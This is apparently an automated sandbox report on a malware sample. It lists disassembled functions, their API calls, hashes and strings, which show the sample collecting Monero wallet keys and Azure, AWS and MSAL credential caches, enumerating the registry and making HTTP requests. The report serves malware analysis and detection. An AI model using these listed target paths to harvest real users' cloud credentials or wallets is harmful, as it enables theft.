Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 846535bcc7883542644a758d6ad617b788aea09c87165796be3949f1ecf692fe
Instruction ID: dc38cd4a9a73afc621a1a3d15b6866e0b6d63bc04ea48beb657edae17f92f1ef
Opcode Fuzzy Hash: 846535bcc7883542644a758d6ad617b788aea09c87165796be3949f1ecf692fe
Instruction Fuzzy Hash: C6122071820118AAEB15FBA1DC95FEE7338BF14704F5045AFF10662091DFB82A5ACF69

Function 0047CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0110A750,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01109178,?,\Monero\wallet.keys,00490E17), ref: 00488B86

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0047D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0047D0CE
lstrcat.KERNEL32(?,00000000), ref: 0047D208
lstrcat.KERNEL32(?,00491478), ref: 0047D217
lstrcat.KERNEL32(?,00000000), ref: 0047D22A
lstrcat.KERNEL32(?,0049147C), ref: 0047D239
lstrcat.KERNEL32(?,00000000), ref: 0047D24C
lstrcat.KERNEL32(?,00491480), ref: 0047D25B
lstrcat.KERNEL32(?,00000000), ref: 0047D26E
lstrcat.KERNEL32(?,00491484), ref: 0047D27D
lstrcat.KERNEL32(?,00000000), ref: 0047D290
lstrcat.KERNEL32(?,00491488), ref: 0047D29F
lstrcat.KERNEL32(?,00000000), ref: 0047D2B2
lstrcat.KERNEL32(?,0049148C), ref: 0047D2C1
lstrcat.KERNEL32(?,00000000), ref: 0047D2D4
lstrcat.KERNEL32(?,00491490), ref: 0047D2E3

Part of subcall function 0048A820: lstrlen.KERNEL32(00474F05,?,?,00474F05,00490DDE), ref: 0048A82B
Part of subcall function 0048A820: lstrcpy.KERNEL32(00490DDE,00000000), ref: 0048A885

lstrlen.KERNEL32(?), ref: 0047D32A
lstrlen.KERNEL32(?), ref: 0047D339

Part of subcall function 0048AA70: StrCmpCA.SHLWAPI(01109068,0047A7A7,?,0047A7A7,01109068), ref: 0048AA8F

DeleteFileA.KERNEL32(00000000), ref: 0047D3B4

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: acf98da57694f0b89d12698214d1ababb3cdc0ca2352fb944efbf9386273b009
Instruction ID: 31a09c0871ecd7085c2c33b76d67df6944a978b77e63c4f1da9b6de2f2dcfa3e
Opcode Fuzzy Hash: acf98da57694f0b89d12698214d1ababb3cdc0ca2352fb944efbf9386273b009
Instruction Fuzzy Hash: 42E16FB1910108ABDB04FBA1DD96EEE7379AF14304F10455BF106A20A1DE7CAA55CB7A

Function 00488320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

RegOpenKeyExA.KERNEL32(00000000,0110B488,00000000,00020019,00000000,004905B6), ref: 004883A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00488426
wsprintfA.USER32 ref: 00488459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0048847B
RegCloseKey.ADVAPI32(00000000), ref: 0048848C
RegCloseKey.ADVAPI32(00000000), ref: 00488499

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Strings

?, xrefs: 0048837A
- , xrefs: 004885A3
%s\%s, xrefs: 0048844D

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 37474cb59c04230c869e177ddb732a9899ba30e562d32cb8e61947892a3bdbfa
Instruction ID: 14bd2cc04e77d0c6836271b3606689e176899d5232f9c6f1af566b15404b8a51
Opcode Fuzzy Hash: 37474cb59c04230c869e177ddb732a9899ba30e562d32cb8e61947892a3bdbfa
Instruction Fuzzy Hash: 1A811EB1910118ABEB24EB50CC91FEE77B9FF08704F4086DAE109A6140DF796B85CFA5

Function 00476280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Part of subcall function 004747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
Part of subcall function 004747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

InternetOpenA.WININET(00490DFE,00000001,00000000,00000000,00000000), ref: 004762E1
StrCmpCA.SHLWAPI(?,0110E8F8), ref: 00476303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00476335
HttpOpenRequestA.WININET(00000000,GET,?,0110E278,00000000,00000000,00400100,00000000), ref: 00476385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004763BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004763D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004763FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0047646D
InternetCloseHandle.WININET(00000000), ref: 004764EF
InternetCloseHandle.WININET(00000000), ref: 004764F9
InternetCloseHandle.WININET(00000000), ref: 00476503

Strings

GET, xrefs: 0047637C
ERROR, xrefs: 004764C9
ERROR, xrefs: 00476407

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 0d41fb7ce15f40a8a9f66737177bd4bda9b736cc215cca613a9bc1869962c7cb
Instruction ID: 87f3cc9eafe6b2573de530db317f036a45e015956719af36f1e0df34e13874ff
Opcode Fuzzy Hash: 0d41fb7ce15f40a8a9f66737177bd4bda9b736cc215cca613a9bc1869962c7cb
Instruction Fuzzy Hash: 6A715071A00218ABEF14EFE0DC45BEE7775BB44700F10859AF5096B190DBB86A85CF56

Function 00485510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A820: lstrlen.KERNEL32(00474F05,?,?,00474F05,00490DDE), ref: 0048A82B
Part of subcall function 0048A820: lstrcpy.KERNEL32(00490DDE,00000000), ref: 0048A885

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00485644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004856A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00485857

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Part of subcall function 004851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00485228

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 004852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00485318
Part of subcall function 004852C0: lstrlen.KERNEL32(00000000), ref: 0048532F
Part of subcall function 004852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00485364
Part of subcall function 004852C0: lstrlen.KERNEL32(00000000), ref: 00485383
Part of subcall function 004852C0: lstrlen.KERNEL32(00000000), ref: 004853AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0048578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00485940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00485A0C
Sleep.KERNEL32(0000EA60), ref: 00485A1B

Strings

ERROR, xrefs: 0048577D
ERROR, xrefs: 00485693
ERROR, xrefs: 00485932
ERROR, xrefs: 004859FE
ERROR, xrefs: 00485636
ERROR, xrefs: 00485849

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 67aa3a3b624dbf14ae515dc4d2b672d086be53ad0efbeff52eb2fd66a249d702
Instruction ID: 88efdae90fb068104a639411df46e0a71004b26558607818a40ace8b38b362b4
Opcode Fuzzy Hash: 67aa3a3b624dbf14ae515dc4d2b672d086be53ad0efbeff52eb2fd66a249d702
Instruction Fuzzy Hash: 06E18571910104AADB18FBB1DC96EED7339AF54304F50892FB40652091EF7C6F59CBAA

Function 00484D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B

lstrcat.KERNEL32(?,00000000), ref: 00484DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00484DCD

Part of subcall function 00484910: wsprintfA.USER32 ref: 0048492C
Part of subcall function 00484910: FindFirstFileA.KERNEL32(?,?), ref: 00484943

lstrcat.KERNEL32(?,00000000), ref: 00484E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00484E59

Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FDC), ref: 00484971
Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FE0), ref: 00484987
Part of subcall function 00484910: FindNextFileA.KERNEL32(000000FF,?), ref: 00484B7D
Part of subcall function 00484910: FindClose.KERNEL32(000000FF), ref: 00484B92

lstrcat.KERNEL32(?,00000000), ref: 00484EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00484EE5

Part of subcall function 00484910: wsprintfA.USER32 ref: 004849B0
Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,004908D2), ref: 004849C5
Part of subcall function 00484910: wsprintfA.USER32 ref: 004849E2
Part of subcall function 00484910: PathMatchSpecA.SHLWAPI(?,?), ref: 00484A1E
Part of subcall function 00484910: lstrcat.KERNEL32(?,0110E788), ref: 00484A4A
Part of subcall function 00484910: lstrcat.KERNEL32(?,00490FF8), ref: 00484A5C
Part of subcall function 00484910: lstrcat.KERNEL32(?,?), ref: 00484A70
Part of subcall function 00484910: lstrcat.KERNEL32(?,00490FFC), ref: 00484A82
Part of subcall function 00484910: lstrcat.KERNEL32(?,?), ref: 00484A96
Part of subcall function 00484910: CopyFileA.KERNEL32(?,?,00000001), ref: 00484AAC
Part of subcall function 00484910: DeleteFileA.KERNEL32(?), ref: 00484B31

Strings

Azure\.aws, xrefs: 00484E5F
Azure\.azure, xrefs: 00484DD3
*.*, xrefs: 00484E64
\.IdentityService\, xrefs: 00484ED9
\.aws\, xrefs: 00484E4D
*.*, xrefs: 00484DD8
\.azure\, xrefs: 00484DC1
Azure\.IdentityService, xrefs: 00484EEB
msal.cache, xrefs: 00484EF0

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 47d4bd44390b4f55a367ad6c7e549dcf448617124f55ec3e8249cf078585bbc1
Instruction ID: 23ff446dc7d672453a74ca43df98b80c96a4edd2c9431aeca20ed82a6edaaf37
Opcode Fuzzy Hash: 47d4bd44390b4f55a367ad6c7e549dcf448617124f55ec3e8249cf078585bbc1
Instruction Fuzzy Hash: 8941A3BAA4020866DB14F770DC47FED3638AB64704F0049AAB149664C1EEFD5BC98B96

Function 00471310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004712B4
Part of subcall function 004712A0: RtlAllocateHeap.NTDLL(00000000), ref: 004712BB
